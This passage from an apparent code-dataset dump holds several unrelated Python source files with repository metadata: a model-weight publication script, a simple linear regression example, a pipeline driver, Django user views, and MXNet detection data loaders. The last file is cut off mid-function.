] | permissive | erhanbas/imgclsmob | 02057ceabf863ce571507abbee89d7d4fd3431b3 | 5eacf51b96c8e715f73a77261395f0fac35dfffc | refs/heads/master | 2023-03-11T05:43:02.358759 | 2021-02-11T17:56:22 | 2021-02-11T17:56:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,378 | py | """
Script for preparing the model for publication.
"""
import os
import argparse
import subprocess
import shutil
import re
import hashlib
import zipfile
import pandas as pd
def parse_args():
    """
    Parse command-line parameters for the script.

    Returns:
    -------
    argparse.Namespace
        Parsed arguments: required model name and optional Gluon weights path.
    """
    arg_parser = argparse.ArgumentParser(
        description="Prepare model",
        formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    arg_parser.add_argument(
        "--model",
        type=str,
        required=True,
        help="model name")
    arg_parser.add_argument(
        "--resume",
        type=str,
        default="",
        help="model weights (Gluon) file path")
    return arg_parser.parse_args()
def calc_sha1(file_name):
    """
    Calculate the sha1 hash of a file's content.

    Parameters:
    ----------
    file_name : str
        Path to the file.

    Returns:
    -------
    str
        sha1 hex digest.
    """
    digest = hashlib.sha1()
    # Feed the file through in 1 MiB chunks so large files stay cheap on memory.
    with open(file_name, "rb") as stream:
        for chunk in iter(lambda: stream.read(1048576), b""):
            digest.update(chunk)
    return digest.hexdigest()
def post_process(dst_dir_path,
                 model_name,
                 model_file_path,
                 log_file_path,
                 dst_model_file_ext,
                 log_line_num):
    """
    Post-process weight/log files: rename them to the published naming scheme
    and zip the weights.

    Parameters:
    ----------
    dst_dir_path : str
        Destination dir path.
    model_name : str
        Model name.
    model_file_path : str
        Model file path.
    log_file_path : str
        Log file path.
    dst_model_file_ext : str
        Destination model file extension.
    log_line_num : int
        Log file last line number for analysis (typically negative, indexing
        from the end of the log).
    Returns:
    -------
    top5_err : str
        top5 error value (fractional digits only, as a string).
    sha1_value : str
        sha1 hex digest.
    """
    # Pick the summary line that contains the evaluation metrics.
    with open(log_file_path, "r") as f:
        log_file_tail = f.read().splitlines()[log_line_num]
    # Keep only the digits after the decimal point of the top-5 error,
    # e.g. "err-top5=12.3456" -> "3456"; this fragment goes into the file name.
    top5_err = re.findall(r"\d+\.\d+", re.findall(r", err-top5=\d+\.\d+", log_file_tail)[0])[0].split(".")[1]
    sha1_value = calc_sha1(model_file_path)
    # Published name pattern: <model>-<top5 fraction>-<first 8 sha1 hex>.<ext>
    dst_model_file_name = "{}-{}-{}.{}".format(model_name, top5_err, sha1_value[:8], dst_model_file_ext)
    dst_model_file_path = os.path.join(dst_dir_path, dst_model_file_name)
    # Move the weights and the log into the destination dir under that name.
    os.rename(model_file_path, dst_model_file_path)
    os.rename(log_file_path, dst_model_file_path + ".log")
    # Ship the weights zipped; drop the uncompressed copy once archived.
    with zipfile.ZipFile(dst_model_file_path + ".zip", "w", zipfile.ZIP_DEFLATED) as zf:
        zf.write(filename=dst_model_file_path, arcname=dst_model_file_name)
    os.remove(dst_model_file_path)
    return top5_err, sha1_value
def process_fwk(prep_info_dict,
                dst_framework,
                dst_dir_path,
                model_name,
                model_file_path,
                log_file_path):
    """
    Process weights on a specific framework: convert the Gluon weights if
    needed, evaluate them with the framework's eval script, and record the
    resulting top-5 error and sha1 into `prep_info_dict` (mutated in place).

    Parameters:
    ----------
    prep_info_dict : dict
        Dictionary with preparation meta-info; keys 'Type'/'Top5'/'Sha1'
        are appended to.
    dst_framework : str
        Destination framework ('gluon', 'pytorch', 'chainer' or 'tf2').
    dst_dir_path : str
        Destination dir path.
    model_name : str
        Model name.
    model_file_path : str
        Model file path (Gluon .params).
    log_file_path : str
        Log file path.
    """
    # Per-framework settings: weight extension, eval script name, GPU count,
    # whether FLOPs are computed, and which log line holds the final metrics.
    if dst_framework == "gluon":
        dst_model_file_ext = "params"
        eval_script = "eval_gl"
        num_gpus = 1
        calc_flops = "--calc-flops"
        log_line_num = -3
    elif dst_framework == "pytorch":
        dst_model_file_ext = "pth"
        eval_script = "eval_pt"
        num_gpus = 1
        calc_flops = "--calc-flops"
        log_line_num = -3
    elif dst_framework == "chainer":
        dst_model_file_ext = "npz"
        eval_script = "eval_ch"
        num_gpus = 0
        calc_flops = ""
        log_line_num = -2
    elif dst_framework == "tf2":
        dst_model_file_ext = "tf2.h5"
        eval_script = "eval_tf2"
        num_gpus = 1
        calc_flops = ""
        log_line_num = -2
    else:
        raise ValueError("Unknown framework: {}".format(dst_framework))

    # A post-processed log (".<ext>.log") means this framework was already
    # handled in a previous run; then only the sha1 is recomputed below.
    post_proc_log_files = [f for f in os.listdir(dst_dir_path) if f.endswith(".{}.log".format(dst_model_file_ext))]
    assert (len(post_proc_log_files) in [0, 1])
    if len(post_proc_log_files) == 0:
        dst_raw_log_file_path = os.path.join(dst_dir_path, "train.log")
        shutil.copy2(log_file_path, dst_raw_log_file_path)
        dst_raw_model_file_path = os.path.join(dst_dir_path, "{}.{}".format(model_name, dst_model_file_ext))
        if dst_framework == "gluon":
            # Source weights are already Gluon: no conversion needed.
            shutil.copy2(model_file_path, dst_raw_model_file_path)
        else:
            # Convert Gluon weights to the destination framework via the
            # external conversion script.
            command = "python3 convert_models.py --src-fwk=gluon --dst-fwk={dst_framework} --src-model={model_name}" \
                      " --dst-model={model_name} --src-params={model_file_path}" \
                      " --dst-params={dst_raw_model_file_path} --save-dir={dst_dir_path}"
            subprocess.call([command.format(
                dst_framework=dst_framework,
                model_name=model_name,
                model_file_path=model_file_path,
                dst_raw_model_file_path=dst_raw_model_file_path,
                dst_dir_path=dst_dir_path)], shell=True)
        # Evaluate the (possibly converted) weights; the eval script appends
        # its metrics to train.log in dst_dir_path.
        command = "python3 {eval_script}.py --model={model_name} --resume={dst_raw_model_file_path}" \
                  " --save-dir={dst_dir_path} --num-gpus={num_gpus} --batch-size=100 -j=4 {calc_flops}"
        subprocess.call([command.format(
            eval_script=eval_script,
            model_name=model_name,
            dst_raw_model_file_path=dst_raw_model_file_path,
            dst_dir_path=dst_dir_path,
            num_gpus=num_gpus,
            calc_flops=calc_flops)], shell=True)
        if dst_framework == "gluon":
            # Keep the original log location in sync with the evaluated one.
            shutil.copy2(dst_raw_log_file_path, log_file_path)
        top5_err, sha1_value = post_process(
            dst_dir_path=dst_dir_path,
            model_name=model_name,
            model_file_path=dst_raw_model_file_path,
            log_file_path=dst_raw_log_file_path,
            dst_model_file_ext=dst_model_file_ext,
            log_line_num=log_line_num)
    else:
        # Recover top5/sha1 from the existing "<name>-<top5>-<sha1[:8]>" file
        # name, unzip the archive temporarily to recompute the full sha1.
        model_name1, top5_err, sha1_short = post_proc_log_files[0].split(".")[0].split("-")
        assert (model_name1 == model_name)
        dst_model_file_name = "{}-{}-{}.{}".format(model_name, top5_err, sha1_short, dst_model_file_ext)
        dst_model_file_path = os.path.join(dst_dir_path, dst_model_file_name)
        dst_zip_model_file_path = dst_model_file_path + ".zip"
        assert os.path.exists(dst_zip_model_file_path)
        with zipfile.ZipFile(dst_zip_model_file_path, "r") as zf:
            zf.extract(dst_model_file_name, dst_dir_path)
        sha1_value = calc_sha1(dst_model_file_path)
        os.remove(dst_model_file_path)

    prep_info_dict["Type"].append(dst_framework)
    prep_info_dict["Top5"].append(top5_err)
    prep_info_dict["Sha1"].append(sha1_value)
def main():
    """Entry point: for each destination framework, convert/evaluate the
    trained Gluon weights found via --resume and write a tab-separated
    summary table (prep_info.csv) next to them."""
    args = parse_args()
    model_name = args.model

    model_file_path = os.path.expanduser(args.resume)
    if not os.path.exists(model_file_path):
        raise Exception("Model file doesn't exist: {}".format(model_file_path))
    root_dir_path = os.path.dirname(model_file_path)
    log_file_path = os.path.join(root_dir_path, "train.log")
    if not os.path.exists(log_file_path):
        raise Exception("Log file doesn't exist: {}".format(log_file_path))

    # All per-framework artifacts go into a "_result" subdirectory.
    dst_dir_path = os.path.join(root_dir_path, "_result")
    if not os.path.exists(dst_dir_path):
        os.mkdir(dst_dir_path)

    prep_info_dict = {key: [] for key in ("Type", "Top5", "Sha1")}
    # dst_frameworks = ["tf2"]
    for dst_framework in ["gluon", "pytorch", "chainer", "tf2"]:
        process_fwk(
            prep_info_dict=prep_info_dict,
            dst_framework=dst_framework,
            dst_dir_path=dst_dir_path,
            model_name=model_name,
            model_file_path=model_file_path,
            log_file_path=log_file_path)

    pd.DataFrame(prep_info_dict).to_csv(
        os.path.join(root_dir_path, "prep_info.csv"),
        sep="\t",
        index=False)


if __name__ == '__main__':
    main()
| [
"osemery@gmail.com"
] | osemery@gmail.com |
5785c2cf7d09d99cb7127abda3281fc2feef3960 | 08f7a3c56db1b937696272fd07f1df52fee863d7 | /Linear_Regression/simple_linear_regression.py | fe03c685fb78748a12066fde223ebc9dfd90d6d7 | [
"MIT"
] | permissive | Randyjp/ml_sl_models | 5c29643f79c0c41fb38a51ae819ab7b9570740ab | 8d8735d312adc3e59398ce4154fc58dfe62c66a9 | refs/heads/master | 2021-09-07T12:23:02.545941 | 2018-02-22T21:24:32 | 2018-02-22T21:24:32 | 119,282,712 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,163 | py | from sklearn.datasets import load_boston
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import cross_val_predict, cross_val_score
import matplotlib.pyplot as plt
# load the data set we'll be working with. In this case the Boston housing
# Fit a simple one-feature linear regression (LSTAT -> median house price)
# on the Boston housing data and visualise cross-validated predictions.
boston = load_boston()
y = boston.target  # response variable(y) = median house price
# Task 1) make a linear regression model with lstat to predict median value
# NOTE(review): variable is spelled "lsat" but holds the LSTAT feature.
lsat = boston.data[:, 12].reshape(-1, 1)  # select the 13th column and make it matrix(reshape)
lr1 = LinearRegression()  # create the object
lr1.fit(lsat, y)
# cross_val_predict returns an array of the same size as `y` where each entry
# is a prediction obtained by cross validation:
predicted = cross_val_predict(lr1, lsat, y, cv=10)
# 10-fold cross-validated R^2 scores, reported as mean +/- 2*std.
scores = cross_val_score(lr1, lsat, y, cv=10)
print("Accuracy: %0.2f (+/- %0.2f)" % (scores.mean(), scores.std() * 2))
# Scatter of measured vs. predicted values with the ideal y=x reference line.
fig, ax = plt.subplots()
ax.scatter(y, predicted, edgecolors=(0, 0, 0))  # predicted values
ax.plot([y.min(), y.max()], [y.min(), y.max()], 'k--', lw=4)  # regression line
ax.set_xlabel('Measured')
ax.set_ylabel('Predicted')
# display the plot window
plt.show()
| [
"randy@Randys-MacBook-Pro.local"
] | randy@Randys-MacBook-Pro.local |
e48a135645e3ef4e54e636050eed7af1fa14972e | 9d1c260ff8e58335e0f373cfdd530e637ea803a8 | /EVENT.py | 963c1b66313d4f3a5b72fbc09ebc1ccffb81b482 | [
"MIT"
] | permissive | rambasnet/EVENT | e52931e3224b712e8b044e58382e4d170a835dc4 | dd3a6507112e4adc054481608d8968706f80d23f | refs/heads/master | 2020-06-01T23:39:28.843906 | 2019-06-09T20:07:02 | 2019-06-09T20:07:02 | 190,967,667 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 963 | py | #-----------------------------------------------------------------------------
# Name: event.py
# Purpose:
#
# Author: Ram Basnet
#
# Created: 2009/10/10
# RCS-ID: $Id: event.py $
# Copyright: (c) 2009
# Licence: All Rights Reserved.
#-----------------------------------------------------------------------------
import sys
import Parsers
import Consolidation
import Reports
import Charts
import Navigation
from Config import *
# Pipeline driver: parse inputs, consolidate, then emit reports, charts and
# navigation pages. NOTE: this is Python 2 code (`raw_input`).
if __name__ == "__main__":
    #fout = open('EVENT.log', 'w')
    #temp = sys.stdout
    #sys.stdout = fout
    # Load configuration before any pipeline stage runs.
    ReadConfigFile()
    #Run parsers
    Parsers.main()
    #Run consolidation
    Consolidation.main()
    #run reports
    Reports.main()
    #run charts
    Charts.main()
    #run navigation
    Navigation.GenerateNavigation()
    # Keep the console window open until the user acknowledges completion.
    raw_input('All done! Please hit Enter key to continue...')
    #sys.stdout.close()
    #sys.stdout = temp
| [
"rambasnet@gmail.com"
] | rambasnet@gmail.com |
b1e5746abe4f2a60c8abfb1769dffacfa9dc968c | 74b595899d732dba5d3880735d35003eac0d5695 | /users/views.py | 5a044a6810be38dbdd6e0bab44d451b3bba06921 | [] | no_license | SirCna98/FinalKarshenasiProjectSocialWebsite | 5f60c3dfb108db27af9ae7ce305bbf0b0bbec326 | 00b04c832b911da7a4132033c8690a739bcbbfa2 | refs/heads/master | 2023-06-21T20:14:25.860786 | 2021-07-08T07:10:01 | 2021-07-08T07:10:01 | 384,031,430 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,460 | py | from django.shortcuts import render, redirect
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from .forms import UserRegisterForm, UserUpdateForm, ProfileUpdateForm
def register(request):
    """Handle user sign-up.

    On POST, validate the registration form; if valid, create the user,
    flash a success message and redirect to the login page. On GET (or an
    invalid POST, which falls through with the bound form so field errors
    are rendered), show the registration page.
    """
    if request.method == 'POST':
        form = UserRegisterForm(request.POST)
        if form.is_valid():
            form.save()
            # Plain string: the original used an f-string with no placeholders.
            messages.success(request, 'Your account has been created! You are now able to log in')
            return redirect('login')
    else:
        form = UserRegisterForm()
    return render(request, 'users/register.html', {'form': form})
@login_required
def profile(request):
    """Display and update the logged-in user's account and profile.

    On POST, validate both the user form and the profile form (the latter
    also receives uploaded files, e.g. a profile image); if both are valid,
    save them and redirect back to the profile page. On GET (or an invalid
    POST, which falls through with the bound forms so errors are rendered),
    show the forms pre-filled with the current data.
    """
    if request.method == 'POST':
        u_form = UserUpdateForm(request.POST, instance=request.user)
        p_form = ProfileUpdateForm(request.POST,
                                   request.FILES,
                                   instance=request.user.profile)
        if u_form.is_valid() and p_form.is_valid():
            u_form.save()
            p_form.save()
            # Plain string: the original used an f-string with no placeholders.
            messages.success(request, 'Your account has been updated!')
            return redirect('profile')
    else:
        u_form = UserUpdateForm(instance=request.user)
        p_form = ProfileUpdateForm(instance=request.user.profile)

    context = {
        'u_form': u_form,
        'p_form': p_form
    }
    return render(request, 'users/profile.html', context)
"46351734+SirCna98@users.noreply.github.com"
] | 46351734+SirCna98@users.noreply.github.com |
fb329b172f65df3eda2304e0d4b90c8211e3863f | 30816710f64515d9af98b19da522ecdd2a745258 | /origin/faster_rcnn/core/loader.py | 4281edcfaa68aef9a31cdc9bc02c5122ecfb40b4 | [] | no_license | unsky/Feature-Pyramid-Networks | 457a441a500b1b552b5a89c11384e96f8cf60dd5 | 890e9c74a8fcea20bd33b90bac6c58e42294298d | refs/heads/master | 2021-06-26T00:59:50.874246 | 2017-09-06T02:57:19 | 2017-09-06T02:57:19 | 101,043,340 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,702 | py | # --------------------------------------------------------
# Deformable Convolutional Networks
# Copyright (c) 2016 by Contributors
# Copyright (c) 2017 Microsoft
# Licensed under The Apache-2.0 License [see LICENSE for details]
# Modified by Yuwen Xiong
# --------------------------------------------------------
import numpy as np
import mxnet as mx
from mxnet.executor_manager import _split_input_slice
from config.config import config
from utils.image import tensor_vstack
from rpn.rpn import get_rpn_testbatch, get_rpn_batch, assign_anchor
from rcnn import get_rcnn_testbatch, get_rcnn_batch
class TestLoader(mx.io.DataIter):
    """MXNet data iterator that feeds test batches (images + im_info or
    precomputed rois) to the detection network at inference time.

    NOTE: written for Python 2 (`getindex` relies on integer `/` division).
    """

    def __init__(self, roidb, config, batch_size=1, shuffle=False,
                 has_rpn=False):
        """
        :param roidb: preprocessed roidb (list of per-image dicts)
        :param config: experiment config
        :param batch_size: number of images per batch
        :param shuffle: shuffle image order on reset
        :param has_rpn: if True feed 'data'+'im_info' (RPN proposals are
                        generated by the net); else feed 'data'+'rois'
        """
        super(TestLoader, self).__init__()

        # save parameters as properties
        self.cfg = config
        self.roidb = roidb
        self.batch_size = batch_size
        self.shuffle = shuffle
        self.has_rpn = has_rpn

        # infer properties from roidb
        self.size = len(self.roidb)
        self.index = np.arange(self.size)

        # decide data and label names (only for training)
        if has_rpn:
            self.data_name = ['data', 'im_info']
        else:
            self.data_name = ['data', 'rois']
        self.label_name = None

        # status variable for synchronization between get_data and get_label
        self.cur = 0
        self.data = None
        self.label = []
        self.im_info = None

        # get first batch to fill in provide_data and provide_label
        self.reset()
        self.get_batch()

    @property
    def provide_data(self):
        # One [(name, shape), ...] list per image in the current batch.
        return [[(k, v.shape) for k, v in zip(self.data_name, idata)] for idata in self.data]

    @property
    def provide_label(self):
        # No labels at test time.
        return [None for _ in range(len(self.data))]

    @property
    def provide_data_single(self):
        return [(k, v.shape) for k, v in zip(self.data_name, self.data[0])]

    @property
    def provide_label_single(self):
        return None

    def reset(self):
        """Rewind to the first image, reshuffling if enabled."""
        self.cur = 0
        if self.shuffle:
            np.random.shuffle(self.index)

    def iter_next(self):
        return self.cur < self.size

    def next(self):
        """Return (im_info, DataBatch) for the next batch or StopIteration.

        Note the non-standard return: im_info is yielded alongside the
        DataBatch so callers can map predictions back to image scale.
        """
        if self.iter_next():
            self.get_batch()
            self.cur += self.batch_size
            return self.im_info, mx.io.DataBatch(data=self.data, label=self.label,
                                                 pad=self.getpad(), index=self.getindex(),
                                                 provide_data=self.provide_data, provide_label=self.provide_label)
        else:
            raise StopIteration

    def getindex(self):
        # Integer batch index (Python 2 integer division).
        return self.cur / self.batch_size

    def getpad(self):
        # Number of padding entries in the (possibly short) last batch.
        if self.cur + self.batch_size > self.size:
            return self.cur + self.batch_size - self.size
        else:
            return 0

    def get_batch(self):
        """Load the current slice of roidb into self.data / self.im_info."""
        cur_from = self.cur
        cur_to = min(cur_from + self.batch_size, self.size)
        roidb = [self.roidb[self.index[i]] for i in range(cur_from, cur_to)]
        if self.has_rpn:
            data, label, im_info = get_rpn_testbatch(roidb, self.cfg)
        else:
            data, label, im_info = get_rcnn_testbatch(roidb, self.cfg)
        self.data = [[mx.nd.array(idata[name]) for name in self.data_name] for idata in data]
        self.im_info = im_info

    def get_batch_individual(self):
        """Variant of get_batch that stores a flat NDArray list.
        NOTE(review): indexes `data[name]` although the *batch helpers
        return a list of dicts — looks inconsistent with get_batch; verify
        against callers before relying on this method.
        """
        cur_from = self.cur
        cur_to = min(cur_from + self.batch_size, self.size)
        roidb = [self.roidb[self.index[i]] for i in range(cur_from, cur_to)]
        if self.has_rpn:
            data, label, im_info = get_rpn_testbatch(roidb, self.cfg)
        else:
            data, label, im_info = get_rcnn_testbatch(roidb, self.cfg)
        self.data = [mx.nd.array(data[name]) for name in self.data_name]
        self.im_info = im_info
class AnchorLoader(mx.io.DataIter):
    """Training iterator for an FPN-style detector: for each batch it loads
    images + ground-truth boxes and assigns RPN anchor labels/regression
    targets on four pyramid levels (p3/p4/p5/p6), each with its own feature
    stride, anchor scales and ratios.

    NOTE: Python 2 code (`xrange` in the provide_* properties).
    """

    def __init__(self, feat_sym_p3,feat_sym_p4,feat_sym_p5,feat_sym_p6,
                 roidb, cfg, batch_size=1, shuffle=False, ctx=None, work_load_list=None,
                 feat_stride_p3=4,
                 anchor_scales_p3=(8, 16, 32),
                 anchor_ratios_p3=(0.5, 1, 2),
                 feat_stride_p4=8,
                 anchor_scales_p4=(8, 16, 32),
                 anchor_ratios_p4=(0.5, 1, 2),
                 feat_stride_p5=16,
                 anchor_scales_p5=(8, 16, 32),
                 anchor_ratios_p5=(0.5, 1, 2),
                 feat_stride_p6=32,
                 anchor_scales_p6=(8, 16, 32),
                 anchor_ratios_p6=(0.5, 1, 2),
                 allowed_border=0,
                 aspect_grouping=False):
        """
        This Iter will provide roi data to Fast R-CNN network

        :param feat_sym_p3..p6: symbols used to infer the feature-map shape
                                of each pyramid level for anchor assignment
        :param roidb: must be preprocessed
        :param batch_size: must divide BATCH_SIZE(128)
        :param shuffle: bool
        :param ctx: list of contexts
        :param work_load_list: list of work load
        :param feat_stride_*/anchor_scales_*/anchor_ratios_*: per-level
                                anchor configuration
        :param allowed_border: how far anchors may extend past the image
        :param aspect_grouping: group images with similar aspects
        :return: AnchorLoader
        """
        super(AnchorLoader, self).__init__()

        # save parameters as properties
        self.feat_sym_p3 = feat_sym_p3
        self.feat_sym_p4 = feat_sym_p4
        self.feat_sym_p5 = feat_sym_p5
        self.feat_sym_p6 = feat_sym_p6
        self.roidb = roidb
        self.cfg = cfg
        self.batch_size = batch_size
        self.shuffle = shuffle
        self.ctx = ctx
        if self.ctx is None:
            self.ctx = [mx.cpu()]
        self.work_load_list = work_load_list
        self.feat_stride_p3 = feat_stride_p3
        self.anchor_scales_p3 = anchor_scales_p3
        self.anchor_ratios_p3 = anchor_ratios_p3
        self.feat_stride_p4 = feat_stride_p4
        self.anchor_scales_p4 = anchor_scales_p4
        self.anchor_ratios_p4 = anchor_ratios_p4
        self.feat_stride_p5 = feat_stride_p5
        self.anchor_scales_p5 = anchor_scales_p5
        self.anchor_ratios_p5 = anchor_ratios_p5
        self.feat_stride_p6 = feat_stride_p6
        self.anchor_scales_p6 = anchor_scales_p6
        self.anchor_ratios_p6 = anchor_ratios_p6
        self.allowed_border = allowed_border
        self.aspect_grouping = aspect_grouping

        # infer properties from roidb
        self.size = len(roidb)
        self.index = np.arange(self.size)

        # decide data and label names
        if config.TRAIN.END2END:
            self.data_name = ['data', 'im_info', 'gt_boxes']
        else:
            self.data_name = ['data']
        # One label/target/weight blob per pyramid level.
        self.label_name = ['label/p3','label/p4','label/p5', 'label/p6','bbox_target/p3','bbox_target/p4','bbox_target/p5', 'bbox_target/p6','bbox_weight/p3','bbox_weight/p4','bbox_weight/p5','bbox_weight/p6']

        # status variable for synchronization between get_data and get_label
        self.cur = 0
        self.batch = None
        self.data = None
        self.label = None

        # get first batch to fill in provide_data and provide_label
        self.reset()
        self.get_batch_individual()

    @property
    def provide_data(self):
        # One [(name, shape), ...] list per device slice.
        return [[(k, v.shape) for k, v in zip(self.data_name, self.data[i])] for i in xrange(len(self.data))]

    @property
    def provide_label(self):
        return [[(k, v.shape) for k, v in zip(self.label_name, self.label[i])] for i in xrange(len(self.data))]

    @property
    def provide_data_single(self):
        return [(k, v.shape) for k, v in zip(self.data_name, self.data[0])]

    @property
    def provide_label_single(self):
        return [(k, v.shape) for k, v in zip(self.label_name, self.label[0])]

    def reset(self):
        """Rewind; when aspect_grouping is on, shuffle so that each batch
        contains images of the same orientation (landscape vs portrait)."""
        self.cur = 0
        if self.shuffle:
            if self.aspect_grouping:
                widths = np.array([r['width'] for r in self.roidb])
                heights = np.array([r['height'] for r in self.roidb])
                horz = (widths >= heights)
                vert = np.logical_not(horz)
                horz_inds = np.where(horz)[0]
                vert_inds = np.where(vert)[0]
                inds = np.hstack((np.random.permutation(horz_inds), np.random.permutation(vert_inds)))
                # NOTE(review): if size is an exact multiple of batch_size,
                # `extra` is 0 and inds[:-0] is empty — verify this case.
                extra = inds.shape[0] % self.batch_size
                inds_ = np.reshape(inds[:-extra], (-1, self.batch_size))
                row_perm = np.random.permutation(np.arange(inds_.shape[0]))
                inds[:-extra] = np.reshape(inds_[row_perm, :], (-1,))
                self.index = inds
            else:
                np.random.shuffle(self.index)

    def iter_next(self):
        # Short final batches are dropped (strict <=).
        return self.cur + self.batch_size <= self.size

    def next(self):
        """Return the next DataBatch or raise StopIteration."""
        if self.iter_next():
            self.get_batch_individual()
            self.cur += self.batch_size
            return mx.io.DataBatch(data=self.data, label=self.label,
                                   pad=self.getpad(), index=self.getindex(),
                                   provide_data=self.provide_data, provide_label=self.provide_label)
        else:
            raise StopIteration

    def getindex(self):
        # Integer batch index (Python 2 integer division).
        return self.cur / self.batch_size

    def getpad(self):
        if self.cur + self.batch_size > self.size:
            return self.cur + self.batch_size - self.size
        else:
            return 0

    def infer_shape(self, max_data_shape=None, max_label_shape=None):
        """ Return maximum data and label shape for single gpu """
        if max_data_shape is None:
            max_data_shape = []
        if max_label_shape is None:
            max_label_shape = []
        max_shapes = dict(max_data_shape + max_label_shape)
        input_batch_size = max_shapes['data'][0]
        im_info = [[max_shapes['data'][2], max_shapes['data'][3], 1.0]]
        # Infer per-level feature-map shapes, then run anchor assignment on
        # an empty gt set just to obtain the label blob shapes.
        _, feat_shape_p3, _ = self.feat_sym_p3.infer_shape(**max_shapes)
        _, feat_shape_p4, _ = self.feat_sym_p4.infer_shape(**max_shapes)
        _, feat_shape_p5, _ = self.feat_sym_p5.infer_shape(**max_shapes)
        _, feat_shape_p6, _ = self.feat_sym_p6.infer_shape(**max_shapes)
        label = assign_anchor(feat_shape_p3[0],feat_shape_p4[0],feat_shape_p5[0] ,feat_shape_p6[0],np.zeros((0, 5)), im_info, self.cfg,
                              self.feat_stride_p3, self.anchor_scales_p3, self.anchor_ratios_p3,
                              self.feat_stride_p4, self.anchor_scales_p4, self.anchor_ratios_p4,
                              self.feat_stride_p5, self.anchor_scales_p5, self.anchor_ratios_p5,
                              self.feat_stride_p6, self.anchor_scales_p6, self.anchor_ratios_p6,
                              self.allowed_border)
        label = [label[k] for k in self.label_name]
        label_shape = [(k, tuple([input_batch_size] + list(v.shape[1:]))) for k, v in zip(self.label_name, label)]
        return max_data_shape, label_shape

    def get_batch(self):
        """Load a batch, pad images to a common size, assign anchors, and
        stack everything into single NDArrays (all-device variant)."""
        # slice roidb
        cur_from = self.cur
        cur_to = min(cur_from + self.batch_size, self.size)
        roidb = [self.roidb[self.index[i]] for i in range(cur_from, cur_to)]

        # decide multi device slice
        work_load_list = self.work_load_list
        ctx = self.ctx
        if work_load_list is None:
            work_load_list = [1] * len(ctx)
        assert isinstance(work_load_list, list) and len(work_load_list) == len(ctx), \
            "Invalid settings for work load. "
        slices = _split_input_slice(self.batch_size, work_load_list)

        # get testing data for multigpu
        data_list = []
        label_list = []
        for islice in slices:
            iroidb = [roidb[i] for i in range(islice.start, islice.stop)]
            data, label = get_rpn_batch(iroidb, self.cfg)
            data_list.append(data)
            label_list.append(label)

        # pad data first and then assign anchor (read label)
        data_tensor = tensor_vstack([batch['data'] for batch in data_list])
        for data, data_pad in zip(data_list, data_tensor):
            data['data'] = data_pad[np.newaxis, :]

        new_label_list = []
        for data, label in zip(data_list, label_list):
            # infer label shape
            data_shape = {k: v.shape for k, v in data.items()}
            del data_shape['im_info']
            _, feat_shape_p3, _ = self.feat_sym_p3.infer_shape(**data_shape)
            feat_shape_p3 = [int(i) for i in feat_shape_p3[0]]
            _, feat_shape_p4, _ = self.feat_sym_p4.infer_shape(**data_shape)
            feat_shape_p4 = [int(i) for i in feat_shape_p4[0]]
            _, feat_shape_p5, _ = self.feat_sym_p5.infer_shape(**data_shape)
            feat_shape_p5 = [int(i) for i in feat_shape_p5[0]]
            _, feat_shape_p6, _ = self.feat_sym_p6.infer_shape(**data_shape)
            feat_shape_p6 = [int(i) for i in feat_shape_p6[0]]

            # add gt_boxes to data for e2e
            data['gt_boxes'] = label['gt_boxes'][np.newaxis, :, :]

            # assign anchor for label
            label = assign_anchor(feat_shape_p3,feat_shape_p4,feat_shape_p5,feat_shape_p6,label['gt_boxes'], data['im_info'], self.cfg,
                                  self.feat_stride_p3, self.anchor_scales_p3,self.anchor_ratios_p3,
                                  self.feat_stride_p4, self.anchor_scales_p4,self.anchor_ratios_p4,
                                  self.feat_stride_p5, self.anchor_scales_p5,self.anchor_ratios_p5,
                                  self.feat_stride_p6, self.anchor_scales_p6,self.anchor_ratios_p6,
                                  self.allowed_border)
            new_label_list.append(label)

        all_data = dict()
        for key in self.data_name:
            all_data[key] = tensor_vstack([batch[key] for batch in data_list])

        all_label = dict()
        for key in self.label_name:
            # Classification labels pad with -1 (ignore); targets pad with 0.
            pad = -1 if key == 'label' else 0
            all_label[key] = tensor_vstack([batch[key] for batch in new_label_list], pad=pad)

        self.data = [mx.nd.array(all_data[key]) for key in self.data_name]
        self.label = [mx.nd.array(all_label[key]) for key in self.label_name]

    def get_batch_individual(self):
        """Load a batch keeping per-device slices separate (one data/label
        NDArray list per context); fetching is delegated to parfetch."""
        cur_from = self.cur
        cur_to = min(cur_from + self.batch_size, self.size)
        roidb = [self.roidb[self.index[i]] for i in range(cur_from, cur_to)]
        # decide multi device slice
        work_load_list = self.work_load_list
        ctx = self.ctx
        if work_load_list is None:
            work_load_list = [1] * len(ctx)
        assert isinstance(work_load_list, list) and len(work_load_list) == len(ctx), \
            "Invalid settings for work load. "
        slices = _split_input_slice(self.batch_size, work_load_list)
        rst = []
        for idx, islice in enumerate(slices):
            iroidb = [roidb[i] for i in range(islice.start, islice.stop)]
            rst.append(self.parfetch(iroidb))
        all_data = [_['data'] for _ in rst]
        all_label = [_['label'] for _ in rst]
        self.data = [[mx.nd.array(data[key]) for key in self.data_name] for data in all_data]
        self.label = [[mx.nd.array(label[key]) for key in self.label_name] for label in all_label]

    def parfetch(self, iroidb):
        """Fetch one device slice: load images/gt, infer per-level feature
        shapes, and assign anchor labels/targets for all four levels."""
        # get testing data for multigpu
        data, label = get_rpn_batch(iroidb, self.cfg)
        data_shape = {k: v.shape for k, v in data.items()}
        del data_shape['im_info']
        _, feat_shape_p3, _ = self.feat_sym_p3.infer_shape(**data_shape)
        feat_shape_p3 = [int(i) for i in feat_shape_p3[0]]
        _, feat_shape_p4, _ = self.feat_sym_p4.infer_shape(**data_shape)
        feat_shape_p4 = [int(i) for i in feat_shape_p4[0]]
        _, feat_shape_p5, _ = self.feat_sym_p5.infer_shape(**data_shape)
        feat_shape_p5 = [int(i) for i in feat_shape_p5[0]]
        _, feat_shape_p6, _ = self.feat_sym_p6.infer_shape(**data_shape)
        feat_shape_p6 = [int(i) for i in feat_shape_p6[0]]

        # add gt_boxes to data for e2e
        data['gt_boxes'] = label['gt_boxes'][np.newaxis, :, :]

        # assign anchor for label
        label = assign_anchor(feat_shape_p3,feat_shape_p4,feat_shape_p5,feat_shape_p6, label['gt_boxes'], data['im_info'], self.cfg,
                              self.feat_stride_p3, self.anchor_scales_p3,self.anchor_ratios_p3,
